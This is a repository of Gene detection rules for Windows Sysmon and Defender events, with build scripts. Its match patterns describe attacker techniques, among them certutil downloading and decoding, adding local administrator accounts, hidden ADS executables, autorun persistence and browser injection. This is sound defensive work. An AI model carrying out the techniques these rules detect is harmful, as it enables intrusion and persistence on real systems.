├── LICENSE ├── README.md ├── compiled.gen ├── compiled.gen.sha256 ├── makefile ├── push.sh ├── rules ├── ads.gen ├── archives.gen ├── autoruns.gen ├── blacklist.gen ├── browsers.gen ├── canary.gen ├── certutil.gen ├── cmd.gen ├── commands.gen ├── defender │ ├── config.gen │ ├── detection.gen │ └── errors.gen ├── dns.gen ├── drivers.gen ├── filters │ └── sysmon.gen ├── heuristics.gen ├── informative.gen ├── laterals.gen ├── mimikatz.gen ├── network.gen ├── office.gen ├── powershell.gen ├── privesc.gen ├── psexec.gen ├── regexp.toml ├── regsvr32.gen ├── remotethread.gen ├── rundll32.gen ├── schedtasks.gen ├── services.gen ├── svchost.gen ├── sysmon.gen ├── timestomp.gen ├── tools.gen ├── wevtutil.gen ├── whids │ ├── README.md │ ├── cryptolocker.gen │ ├── heuristics.gen │ ├── injection.gen │ ├── polymorphic.gen │ ├── privesc.gen │ └── services.gen ├── whitelist.gen └── wmi.gen ├── scripts ├── requirements.txt ├── tester.conf.example └── tester.py ├── tests.md └── tests ├── AutomatedRecursiveDir.json ├── BrowserChild.json ├── CertutilSuspDecode.json ├── DownloadPath.json ├── EmbeddedHTTPLinkInCL.json ├── EventClearing.json ├── ExecDownloadedDocument.json ├── ExecTimestomping.json ├── ExecutableADS.json ├── ExecutableFileCreated.json ├── ExecutableUnkExt.json ├── ExplicitNetworkLogon.json ├── ExplorerInjection.json ├── FilePrivEsc.json ├── Heur7zExec.json ├── HeurADSInCL.json ├── HeurCLWithCreds.json ├── HeurCallShellcode.json ├── HeurDropper.json ├── HeurMaliciousAccess.json ├── HeurOfficeThreat.json ├── HeurPersistentRAT.json ├── HeurRAT.json ├── HeurRemotePayload.json ├── HeurSpawnShell.json ├── HeurSuspFileWrite.json ├── HeurWebShell.json ├── HeurZipExec.json ├── HeuristicSamlibDll.json ├── HeuristicVaultcliDll.json ├── HiddenPsExec.json ├── HighlyPolymorphicCode.json ├── LargeBase64.json ├── LargeCL512.json ├── LargeCL999.json ├── LateralWMI.json ├── LogonFromExternal.json ├── MSOfficeThreat.json ├── MaliciousLsassAccess.json ├── MaliciousSvchostAccess.json ├── 
MediumPolymorphicCode.json ├── Nbtstat.exe.json ├── Net.exe.json ├── NewADS.json ├── NewAutorun.json ├── NewExeCreatedInRoot.json ├── NewRemoteScheduledTask.json ├── NewSchedTaskInReg.json ├── NewSchedTaskOnDisk.json ├── OfficeDropper.json ├── OfficeDropperExec.json ├── PSC#Win32API.json ├── PowershellExecEnc.json ├── PowershellLargeCL.json ├── PowershellSamlibDll.json ├── PowershellStdin.json ├── ProcPrivEsc.json ├── PsExec.json ├── PsExec4624.json ├── PsExecCommand.json ├── Regsvr32ApplockerBypass.json ├── SecurityLogClearing.json ├── ServiceDeletion.json ├── StopSvchostAccess.json ├── SuspWMIC.json ├── SuspWriteAccess.json ├── SuspiciousADS.json ├── SuspiciousLsassAccess.json ├── SuspiciousRundll32.json ├── SuspiciousService.json ├── SuspiciousServiceCreated.json ├── SvcHostUnsignedDll.json ├── SvcHostUntrustedDLL.json ├── SysmonConfigChanged.json ├── SysmonEntePrivesc.json ├── SysmonFingerprinting.json ├── SysmonStateChanged.json ├── SystemInfo.exe.json ├── Tasklist.exe.json ├── UnkPrivDstPort.json ├── UntrustedDriverLoaded.json ├── UntrustedService.json ├── UserTempExec.json ├── WMIChildProcess.json ├── WMIEvents.json ├── WindowsTempExec.json └── Xcopy.exe.json /README.md: -------------------------------------------------------------------------------- 1 | # Description 2 | 3 | Rule repository to feed Gene https://github.com/0xrawsec/gene 4 | 5 | Writing your own rules: https://rawsec.lu/doc/gene/2.0/writerules.html 6 | 7 | # Warning 8 | 9 | Most of the rules here are generic and might not be exactly what you 10 | want so feel free to modify them. 
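--------------------------------------------------------------------------------
/compiled.gen.sha256:
--------------------------------------------------------------------------------
5f467f922e6d94f5461bf43f224a73649db1d16f9a959f62a6e3bf58d786d24c compiled.gen
--------------------------------------------------------------------------------
/makefile:
--------------------------------------------------------------------------------
# Build pipeline for the rule set: verify -> test -> compile.
# GENE must point to the gene binary. Fail early with a readable message
# rather than letting an empty $(GENE) turn the recipe into "-r ./rules ...".
ifndef GENE
$(error GENE is not set; run as 'make GENE=/path/to/gene')
endif

# Recipes use pipelines (tester | sed | tee); with bash + pipefail a failing
# tester run is no longer masked by the exit status of tee.
SHELL := /bin/bash
.SHELLFLAGS := -o pipefail -c

DST=compiled.gen

.PHONY: all verify test compile

all: compile

# Syntax-check every rule under ./rules before anything is generated.
verify:
	$(GENE) -r ./rules -verify

# Run the rule tests and regenerate the coverage report (tests.md).
test: verify
	echo "Testing Rules"
	echo "# Rules Coverage" > tests.md
	echo >> tests.md
	./scripts/tester.py ./scripts/tester.conf | sed "s/$$/\n/" | tee -a tests.md

# Dump every rule into one file and record its SHA-256 next to it.
# The checksum is an integrity aid produced by this same pipeline; it does
# not authenticate the rule set on its own.
compile: test verify
	$(GENE) -r ./rules -dump '.*' > $(DST)
	shasum -a 256 $(DST) > $(DST).sha256
--------------------------------------------------------------------------------
/push.sh:
--------------------------------------------------------------------------------
#!/usr/bin/env bash
# Rebuild the rules and, after confirmation, commit and push everything.
# Capture make's status before testing it: the previous form
# `if [[ $? != 0 ]]; then exit $?` exited with the status of [[ ]] itself
# (always 0), so a failed build could still be committed and pushed.
make
rc=$?
if [[ $rc != 0 ]]
then
    exit $rc
fi

git status
read -p "Are you want to push all those files ? 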
[y/n]" answer 9 | if [[ $answer == "y" ]] 10 | then 11 | git add -A 12 | git commit 13 | git push 14 | fi 15 | -------------------------------------------------------------------------------- /rules/ads.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "NewADS", 3 | "Tags": [ 4 | "ADS" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 15 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 0, 14 | "ATTACK": [ 15 | { 16 | "ID": "T1096", 17 | "Tactic": "defense-evasion", 18 | "Reference": "https://attack.mitre.org/techniques/T1096" 19 | } 20 | ], 21 | "Author": "0xrawsec", 22 | "Comments": "Catch all ADS creation events", 23 | "Schema": "2.0.0" 24 | }, 25 | "Matches": [ 26 | "$broker: Image ~= '(?i:C:\\\\Windows\\\\system32\\\\browser_broker.exe)'", 27 | "$target: TargetFilename ~= '(?i::Zone\\.Identifier$)'" 28 | ], 29 | "Condition": "!($broker and $target)" 30 | } 31 | 32 | { 33 | "Name": "SuspiciousADS", 34 | "Tags": [ 35 | "ADS" 36 | ], 37 | "Meta": { 38 | "Events": { 39 | "Microsoft-Windows-Sysmon/Operational": [ 40 | 15 41 | ] 42 | }, 43 | "Computers": [], 44 | "Criticality": 8, 45 | "ATTACK": [ 46 | { 47 | "ID": "T1096", 48 | "Tactic": "defense-evasion", 49 | "Reference": "https://attack.mitre.org/techniques/T1096" 50 | } 51 | ], 52 | "Author": "0xrawsec", 53 | "Comments": "Catch ADS with suspicious extension", 54 | "Schema": "2.0.0" 55 | }, 56 | "Matches": [ 57 | "$target: TargetFilename ~= '(?i:({{script-exts}}|{{exec-exts}}))$'" 58 | ], 59 | "Condition": "$target" 60 | } 61 | 62 | { 63 | "Name": "ExecutableADS", 64 | "Tags": [ 65 | "ADS" 66 | ], 67 | "Meta": { 68 | "Events": { 69 | "Microsoft-Windows-Sysmon/Operational": [ 70 | 15 71 | ] 72 | }, 73 | "Computers": [], 74 | "Criticality": 10, 75 | "ATTACK": [ 76 | { 77 | "ID": "T1096", 78 | "Tactic": "defense-evasion", 79 | "Reference": "https://attack.mitre.org/techniques/T1096" 80 | } 81 | ], 82 | "Author": 
"0xrawsec", 83 | "Comments": "Heuristics trying to catch EXE in ADS. If it is an EXE it is very likely the IMPHASH field is not null.", 84 | "Schema": "2.0.0" 85 | }, 86 | "Matches": [ 87 | "$unk: Hash = 'Unknown'", 88 | "$impash: Hash ~= '(?i:(IMPHASH=00000000000000000000000000000000))'" 89 | ], 90 | "Condition": "!($impash or $unk)" 91 | } 92 | 93 | { 94 | "Name": "HeurADSInCL", 95 | "Tags": [ 96 | "Heuristics", 97 | "ADS" 98 | ], 99 | "Meta": { 100 | "Events": { 101 | "Microsoft-Windows-Sysmon/Operational": [ 102 | 1 103 | ] 104 | }, 105 | "Computers": [], 106 | "Criticality": 5, 107 | "ATTACK": [ 108 | { 109 | "ID": "T1096", 110 | "Tactic": "defense-evasion", 111 | "Reference": "https://attack.mitre.org/techniques/T1096" 112 | } 113 | ], 114 | "Author": "0xrawsec", 115 | "Comments": "Aims at catching the ADS like strings in command line", 116 | "Schema": "2.0.0" 117 | }, 118 | "Matches": [ 119 | "$ads: CommandLine ~= '(?i:\\.[a-z0-9]{2,5}:\\w*?\\.[a-z0-9]{2,5})'" 120 | ], 121 | "Condition": "$ads" 122 | } 123 | 124 | -------------------------------------------------------------------------------- /rules/archives.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Heur7zExec", 3 | "Tags": [ 4 | "Archive", 5 | "Exec", 6 | "Sysmon" 7 | ], 8 | "Meta": { 9 | "Events": { 10 | "Microsoft-Windows-Sysmon/Operational": [ 11 | 1 12 | ] 13 | }, 14 | "Computers": [], 15 | "Criticality": 5, 16 | "ATTACK": [ 17 | { 18 | "ID": "T1193", 19 | "Tactic": "initial-access", 20 | "Reference": "https://attack.mitre.org/techniques/T1193" 21 | } 22 | ], 23 | "Author": "@0xrawsec", 24 | "Comment": "Execution from 7z archive", 25 | "Schema": "2.0.0" 26 | }, 27 | "Matches": [ 28 | "$pi: ParentImage ~= '(?i:\\\\7zFM\\.exe$)'", 29 | "$i: Image ~= '(?i:^C:\\\\Users\\\\.*\\\\AppData\\\\Local\\\\Temp\\\\)'", 30 | "$cl: CommandLine ~= '(\\\\Temp\\\\.*?({{exec-exts}}|{{script-exts}}))'" 31 | ], 32 | "Condition": "$pi and ($i or $cl)" 33 | } 34 
| 35 | { 36 | "Name": "HeurZipExec", 37 | "Tags": [ 38 | "Archive", 39 | "Exec", 40 | "Sysmon" 41 | ], 42 | "Meta": { 43 | "Events": { 44 | "Microsoft-Windows-Sysmon/Operational": [ 45 | 1 46 | ] 47 | }, 48 | "Computers": [], 49 | "Criticality": 5, 50 | "ATTACK": [ 51 | { 52 | "ID": "T1193", 53 | "Tactic": "initial-access", 54 | "Reference": "https://attack.mitre.org/techniques/T1193" 55 | } 56 | ], 57 | "Author": "@0xrawsec", 58 | "Comment": "Catch scripts and exe launched directly from ZIP files (using Windows default)", 59 | "Schema": "2.0.0" 60 | }, 61 | "Matches": [ 62 | "$pi: ParentImage ~= '(?i:C:\\\\Windows\\\\Explorer\\.exe$)'", 63 | "$cl: CommandLine ~= '(?i:\\\\Temp.*?\\\\[^\\\\]*\\.zip\\\\[^\\\\]*({{exec-exts}}|{{script-exts}}))'" 64 | ], 65 | "Condition": "$pi and $cl" 66 | } 67 | 68 | -------------------------------------------------------------------------------- /rules/autoruns.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "NewAutorun", 3 | "Tags": [ 4 | "Registry", 5 | "Autorun" 6 | ], 7 | "Meta": { 8 | "Events": { 9 | "Microsoft-Windows-Sysmon/Operational": [ 10 | 13 11 | ] 12 | }, 13 | "Computers": [], 14 | "Criticality": 8, 15 | "ATTACK": [ 16 | { 17 | "ID": "T1060", 18 | "Tactic": "persistence", 19 | "Reference": "https://attack.mitre.org/techniques/T1060" 20 | } 21 | ], 22 | "Author": "@0xrawsec", 23 | "Comment": "Spot new autoruns", 24 | "Schema": "2.0.0" 25 | }, 26 | "Matches": [ 27 | "$eventtype: EventType = 'SetValue'", 28 | "$run: TargetObject ~= '(?i:{{SOFTWARE}}\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run)'", 29 | "$runonce: TargetObject ~= '(?i:{{SOFTWARE}}\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce)'", 30 | "$uimls: TargetObject ~= '(?i:\\\\Environment\\\\UserInitMprLogonScript$)'", 31 | "$com: TargetObject ~= '(?i:{{HKCR}}\\\\CLSID)'" 32 | ], 33 | "Condition": "$eventtype and ($run or $runonce or $uimls or $com)" 34 | } 35 | 36 | 
-------------------------------------------------------------------------------- /rules/blacklist.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "BlacklistedHash", 3 | "Tags": [ 4 | "Blacklist" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 1, 10 | 6, 11 | 7 12 | ] 13 | }, 14 | "Computers": [], 15 | "Criticality": 10, 16 | "Author": "0xrawsec", 17 | "Comment": "Check if any hash (MD5, SHA1 or SHA256) is known in the blacklist container", 18 | "Schema": "2.0.0" 19 | }, 20 | "Matches": [ 21 | "$md5: extract('MD5=(?P[A-F0-9]{32})', Hashes) in blacklist", 22 | "$sha1: extract('SHA1=(?P[A-F0-9]{40})', Hashes) in blacklist", 23 | "$sha256: extract('SHA256=(?P[A-F0-9]{64})', Hashes) in blacklist" 24 | ], 25 | "Condition": "$md5 or $sha1 or $sha256" 26 | } 27 | 28 | { 29 | "Name": "BlacklistedImphash", 30 | "Tags": [ 31 | "Blacklist" 32 | ], 33 | "Meta": { 34 | "Events": { 35 | "Microsoft-Windows-Sysmon/Operational": [ 36 | 1, 37 | 6, 38 | 7 39 | ] 40 | }, 41 | "Computers": [], 42 | "Criticality": 8, 43 | "Author": "0xrawsec", 44 | "Comment": "Check if the import hash (IMPHASH) is known in the blacklist container", 45 | "Schema": "2.0.0" 46 | }, 47 | "Matches": [ 48 | "$imphash: extract('IMPHASH=(?P[A-F0-9]{32})', Hashes) in blacklist" 49 | ], 50 | "Condition": "$imphash" 51 | } 52 | 53 | -------------------------------------------------------------------------------- /rules/browsers.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "BrowserSuspiciousChild", 3 | "Tags": [ 4 | "Browser" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 1 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 6, 14 | "Author": "0xrawsec", 15 | "Comment": "Experimental rule that looks for suspicious browser child processes. 
Might raise FPs.", 16 | "Schema": "2.0.0" 17 | }, 18 | "Matches": [ 19 | "$browser: ParentImage ~= '{{browsers}}$'", 20 | "$susp: Image ~= '{{suspicious}}$'", 21 | "$allowed: CommandLine ~= '(?i:rundll32\\.exe.*?(shell32\\.dll\"{0,1},(OpenAs_RunDLL|SHCreateLocalServerRunDll)|inetcpl\\.cpl\"{0,1},ClearMyTracksByProcess|ieframe.dll\"{0,1},OpenURL))'" 22 | ], 23 | "Condition": "$browser and $susp and !$allowed" 24 | } 25 | 26 | { 27 | "Name": "HeurBrowserInjection", 28 | "Tags": [ 29 | "Browser" 30 | ], 31 | "Meta": { 32 | "Events": { 33 | "Microsoft-Windows-Sysmon/Operational": [ 34 | 10 35 | ] 36 | }, 37 | "Computers": [], 38 | "Criticality": 8, 39 | "Author": "0xrawsec", 40 | "Comments": "Experimental rule to catch malicious browser access. Not widely tested.", 41 | "Schema": "2.0.0" 42 | }, 43 | "Matches": [ 44 | "$ct: CallTrace ~= 'UNKNOWN'", 45 | "$src: SourceImage ~= '{{browsers}}$'", 46 | "$dst: TargetImage ~= '{{browsers}}$'", 47 | "$write: GrantedAccess &= '0x20'" 48 | ], 49 | "Condition": "$dst and !$src and $ct and $write" 50 | } 51 | 52 | { 53 | "Name": "BrowserChild", 54 | "Tags": [ 55 | "Browser" 56 | ], 57 | "Meta": { 58 | "Events": { 59 | "Microsoft-Windows-Sysmon/Operational": [ 60 | 1 61 | ] 62 | }, 63 | "Computers": [], 64 | "Criticality": 0, 65 | "Author": "0xrawsec", 66 | "Comment": "Informative rule to flag process started by browser", 67 | "Schema": "2.0.0" 68 | }, 69 | "Matches": [ 70 | "$browser: ParentImage ~= '{{browsers}}$'" 71 | ], 72 | "Condition": "$browser" 73 | } 74 | 75 | -------------------------------------------------------------------------------- /rules/canary.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "CanaryFileRead", 3 | "Tags": [ 4 | "Canary" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Security": [ 9 | 4663 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 10, 14 | "Author": "@0xrawsec", 15 | "Comment": "Canary File(s) that should not be read in normal 
circumstances. The canary regex template has to be adjusted for the rule to work.", 16 | "Requirements": "FileSystem Audit must be activated at least for the canary directories", 17 | "Schema": "2.0.0" 18 | }, 19 | "Matches": [ 20 | "$access: AccessMask &= '0x1'", 21 | "$canary: ObjectName ~= '{{canary}}'" 22 | ], 23 | "Condition": "$access and $canary" 24 | } 25 | 26 | -------------------------------------------------------------------------------- /rules/certutil.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "CertutilDownloader", 3 | "Tags": [ 4 | "Tools" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 1 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 7, 14 | "ATTACK": [ 15 | { 16 | "ID": "T1140", 17 | "Tactic": "defense-evasion", 18 | "Reference": "https://attack.mitre.org/techniques/T1140" 19 | } 20 | ], 21 | "Author": "0xrawsec", 22 | "Comment": "Experimental rule to catch certutil downloader. Criticality may need to be adjusted", 23 | "Schema": "2.0.0" 24 | }, 25 | "Matches": [ 26 | "$certutil: Image ~= '(?i:^c:\\\\windows\\\\sys(tem32|wow64)\\\\certutil\\.exe$)'", 27 | "$urlcache: CommandLine ~= '(?i: -urlcache )'", 28 | "$force: CommandLine ~= '(?i: -f )'", 29 | "$split: CommandLine ~= '(?i: -split )'" 30 | ], 31 | "Condition": "$certutil and $urlcache and $force and $split" 32 | } 33 | 34 | { 35 | "Name": "CertutilSuspDecode", 36 | "Tags": [ 37 | "Tools" 38 | ], 39 | "Meta": { 40 | "Events": { 41 | "Microsoft-Windows-Sysmon/Operational": [ 42 | 1 43 | ] 44 | }, 45 | "Computers": [], 46 | "Criticality": 7, 47 | "ATTACK": [ 48 | { 49 | "ID": "T1140", 50 | "Tactic": "defense-evasion", 51 | "Reference": "https://attack.mitre.org/techniques/T1140" 52 | } 53 | ], 54 | "Author": "0xrawsec", 55 | "Comment": "Experimental rule to catch dropper using certutil. 
Criticality may need to be adjusted", 56 | "Schema": "2.0.0" 57 | }, 58 | "Matches": [ 59 | "$certutil: Image ~= '(?i:^c:\\\\windows\\\\sys(tem32|wow64)\\\\certutil\\.exe$)'", 60 | "$suspdecode: CommandLine ~= '(?i: -decode.*({{exec-exts}}|{{script-exts}}))'" 61 | ], 62 | "Condition": "$certutil and $suspdecode" 63 | } 64 | 65 | -------------------------------------------------------------------------------- /rules/cmd.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "AutomatedRecursiveDir", 3 | "Tags": [ 4 | "Cmd" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 1 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 5, 14 | "Author": "@0xrawsec", 15 | "Comment": "Recursive directory listing", 16 | "Schema": "2.0.0" 17 | }, 18 | "Matches": [ 19 | "$parent: ParentImage ~= '(?i:C:\\\\windows\\\\explorer.exe)'", 20 | "$exe: Image ~= '(?i:\\\\cmd.exe$)'", 21 | "$cmd: CommandLine ~= '(?i:dir.*?/s)'" 22 | ], 23 | "Condition": "!$parent and $exe and $cmd" 24 | } 25 | 26 | -------------------------------------------------------------------------------- /rules/commands.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "AddUser", 3 | "Tags": [ 4 | "" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 1 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 10, 14 | "Author": "0xrawsec", 15 | "Comment": "New user created", 16 | "Schema": "2.0.0" 17 | }, 18 | "Matches": [ 19 | "$net: Image ~= '(?i:C:\\\\Windows\\\\Sys(tem32|wow64)\\\\net1?\\.exe)'", 20 | "$command: CommandLine ~= 'user.*/ADD'" 21 | ], 22 | "Condition": "$net and $command" 23 | } 24 | 25 | { 26 | "Name": "NewLocalAdmin", 27 | "Tags": [ 28 | "" 29 | ], 30 | "Meta": { 31 | "Events": { 32 | "Microsoft-Windows-Sysmon/Operational": [ 33 | 1 34 | ] 35 | }, 36 | "Computers": [], 37 | "Criticality": 10, 38 | "Author": "0xrawsec", 39 
| "Comment": "User added to local Administrators", 40 | "Schema": "2.0.0" 41 | }, 42 | "Matches": [ 43 | "$net: Image ~= '(?i:C:\\\\Windows\\\\Sys(tem32|wow64)\\\\net1?\\.exe)'", 44 | "$command: CommandLine ~= '(?i:localgroup\\s+Administrators.*?/ADD)'" 45 | ], 46 | "Condition": "$net and $command" 47 | } 48 | 49 | -------------------------------------------------------------------------------- /rules/defender/config.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "DefenderConfigChanged", 3 | "Tags": [ 4 | "Defender" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Windows Defender/Operational": [ 9 | 5007 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 8, 14 | "Author": "0xrawsec", 15 | "Comments": "Windows Defender Antivirus configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.", 16 | "Link": "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus#windows-defender-av-ids", 17 | "Schema": "2.0.0" 18 | }, 19 | "Matches": [], 20 | "Condition": "" 21 | } 22 | 23 | { 24 | "Name": "DefenderFeatureDisabled", 25 | "Tags": [ 26 | "Defender" 27 | ], 28 | "Meta": { 29 | "Events": { 30 | "Microsoft-Windows-Windows Defender/Operational": [ 31 | 5010, 32 | 5012 33 | ] 34 | }, 35 | "Computers": [], 36 | "Criticality": 10, 37 | "Author": "0xrawsec", 38 | "Comments": "Antivirus or antispyware disabled", 39 | "Link": "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus#windows-defender-av-ids", 40 | "Schema": "2.0.0" 41 | }, 42 | "Matches": [], 43 | "Condition": "" 44 | } 45 | 46 | -------------------------------------------------------------------------------- /rules/defender/detection.gen: -------------------------------------------------------------------------------- 1 | 
{ 2 | "Name": "DefenderMalwareDetected", 3 | "Tags": [ 4 | "Defender" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Windows Defender/Operational": [ 9 | 1006, 10 | 1116 11 | ] 12 | }, 13 | "Computers": [], 14 | "Criticality": 10, 15 | "Author": "0xrawsec", 16 | "Comments": "Malware has been detected by Windows Defender", 17 | "Link": "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus#windows-defender-av-ids", 18 | "Schema": "2.0.0" 19 | }, 20 | "Matches": [], 21 | "Condition": "" 22 | } 23 | 24 | { 25 | "Name": "DefenderBehaviourDetected", 26 | "Tags": [ 27 | "Defender" 28 | ], 29 | "Meta": { 30 | "Events": { 31 | "Microsoft-Windows-Windows Defender/Operational": [ 32 | 1015 33 | ] 34 | }, 35 | "Computers": [], 36 | "Criticality": 8, 37 | "Author": "0xrawsec", 38 | "Comments": "The antimalware platform detected suspicious behaviour", 39 | "Link": "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus#windows-defender-av-ids", 40 | "Schema": "2.0.0" 41 | }, 42 | "Matches": [], 43 | "Condition": "" 44 | } 45 | 46 | -------------------------------------------------------------------------------- /rules/defender/errors.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "DefenderActionCriticallyFailed", 3 | "Tags": [ 4 | "Defender" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Windows Defender/Operational": [ 9 | 1119, 10 | 5008 11 | ] 12 | }, 13 | "Computers": [], 14 | "Criticality": 8, 15 | "Author": "0xrawsec", 16 | "Comments": "The antimalware platform encountered a critical error when trying to take action on malware or other potentially unwanted software. 
There are more details in the event message.", 17 | "Link": "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus#windows-defender-av-ids", 18 | "Schema": "2.0.0" 19 | }, 20 | "Matches": [], 21 | "Condition": "" 22 | } 23 | 24 | -------------------------------------------------------------------------------- /rules/dns.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "BlacklistedDomain", 3 | "Tags": [ 4 | "DNS" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-DNS-Client/Operational": [] 9 | }, 10 | "Computers": [], 11 | "Criticality": 10, 12 | "Author": "@0xrawsec", 13 | "Comment": "", 14 | "Schema": "2.0.0" 15 | }, 16 | "Matches": [ 17 | "$domainBL: extract('(?P\\w+\\.\\w+$)',QueryName) in blacklist'", 18 | "$subdomainBL: extract('(?P\\w+\\.\\w+\\.\\w+$)',QueryName) in blacklist'", 19 | "$subsubdomainBL: extract('(?P\\w+\\.\\w+\\.\\w+\\.\\w+$)',QueryName) in blacklist'" 20 | ], 21 | "Condition": "$domainBL or $subdomainBL or $subsubdomainBL" 22 | } 23 | 24 | { 25 | "Name": "DomainInMisp", 26 | "Tags": [ 27 | "DNS" 28 | ], 29 | "Meta": { 30 | "Events": { 31 | "Microsoft-Windows-DNS-Client/Operational": [] 32 | }, 33 | "Computers": [], 34 | "Criticality": 10, 35 | "Author": "@0xrawsec", 36 | "Comment": "Domain name present in MISP with IDS flag (misp container assumed)", 37 | "Schema": "2.0.0" 38 | }, 39 | "Matches": [ 40 | "$domainBL: extract('(?P\\w+\\.\\w+$)',QueryName) in misp'", 41 | "$subdomainBL: extract('(?P\\w+\\.\\w+\\.\\w+$)',QueryName) in misp'", 42 | "$subsubdomainBL: extract('(?P\\w+\\.\\w+\\.\\w+\\.\\w+$)',QueryName) in misp'" 43 | ], 44 | "Condition": "$domainBL or $subdomainBL or $subsubdomainBL" 45 | } 46 | 47 | { 48 | "Name": "SysmonDomainInMisp", 49 | "Tags": [ 50 | "DNS", 51 | "Sysmon" 52 | ], 53 | "Meta": { 54 | "Events": { 55 | "Microsoft-Windows-Sysmon/Operational": [ 56 | 22 57 | ] 58 | }, 59 | 
"Computers": [], 60 | "Criticality": 10, 61 | "Author": "@0xrawsec", 62 | "Comment": "Domain name present in MISP with IDS flag (misp container assumed)", 63 | "Schema": "2.0.0" 64 | }, 65 | "Matches": [ 66 | "$domainBL: extract('(?P\\w+\\.\\w+$)',QueryName) in misp'", 67 | "$subdomainBL: extract('(?P\\w+\\.\\w+\\.\\w+$)',QueryName) in misp'", 68 | "$subsubdomainBL: extract('(?P\\w+\\.\\w+\\.\\w+\\.\\w+$)',QueryName) in misp'" 69 | ], 70 | "Condition": "$domainBL or $subdomainBL or $subsubdomainBL" 71 | } 72 | 73 | { 74 | "Name": "HeurLongDomain", 75 | "Tags": [ 76 | "DNS", 77 | "Heuristics" 78 | ], 79 | "Meta": { 80 | "Events": { 81 | "Microsoft-Windows-DNS-Client/Operational": [] 82 | }, 83 | "Computers": [], 84 | "Criticality": 6, 85 | "Author": "@0xrawsec", 86 | "Comment": "Domain name with more than 50 characters", 87 | "Schema": "2.0.0" 88 | }, 89 | "Matches": [ 90 | "$ldomain: QueryName ~= '.{50,}'" 91 | ], 92 | "Condition": "$ldomain" 93 | } 94 | 95 | { 96 | "Name": "HeurSysmonLongDomain", 97 | "Tags": [ 98 | "DNS", 99 | "Heuristics", 100 | "Sysmon" 101 | ], 102 | "Meta": { 103 | "Events": { 104 | "Microsoft-Windows-Sysmon/Operational": [ 105 | 22 106 | ] 107 | }, 108 | "Computers": [], 109 | "Criticality": 6, 110 | "Author": "@0xrawsec", 111 | "Comment": "Domain name with more than 50 characters", 112 | "Schema": "2.0.0" 113 | }, 114 | "Matches": [ 115 | "$ldomain: QueryName ~= '.{50,}'", 116 | "$ip6: QueryName ~= 'ip6\\.arpa\\.$'" 117 | ], 118 | "Condition": "$ldomain and !$ip6" 119 | } 120 | 121 | { 122 | "Name": "HeurDnsFromSuspicious", 123 | "Tags": [ 124 | "DNS", 125 | "Heuristics" 126 | ], 127 | "Meta": { 128 | "Events": { 129 | "Microsoft-Windows-Sysmon/Operational": [ 130 | 22 131 | ] 132 | }, 133 | "Computers": [], 134 | "Criticality": 5, 135 | "Author": "@0xrawsec", 136 | "Comment": "DNS query from executables often used by malware. 
Might trigger some FPs that would need to be whitelisted.", 137 | "Schema": "2.0.0" 138 | }, 139 | "Matches": [ 140 | "$susp: Image ~= '{{suspicious}}$'" 141 | ], 142 | "Condition": "$susp" 143 | } 144 | 145 | -------------------------------------------------------------------------------- /rules/drivers.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "DriverLoadedUnusualPath", 3 | "Tags": [ 4 | "DriverLoaded" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 6 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 4, 14 | "Author": "@0xrawsec", 15 | "Schema": "2.0.0" 16 | }, 17 | "Matches": [ 18 | "$uspath1: ImageLoaded ~= '(?i:C:\\\\Windows\\\\Sys(wow64|tem32))'", 19 | "$uspath2: ImageLoaded ~= '(?i:C:\\\\Windows\\\\Sys(tem32|wow64)\\\\drivers)'" 20 | ], 21 | "Condition": "!$uspath1 and !$uspath2" 22 | } 23 | 24 | { 25 | "Name": "DriverLoadedNotValidSig", 26 | "Tags": [ 27 | "DriverLoaded", 28 | "Signature" 29 | ], 30 | "Meta": { 31 | "Events": { 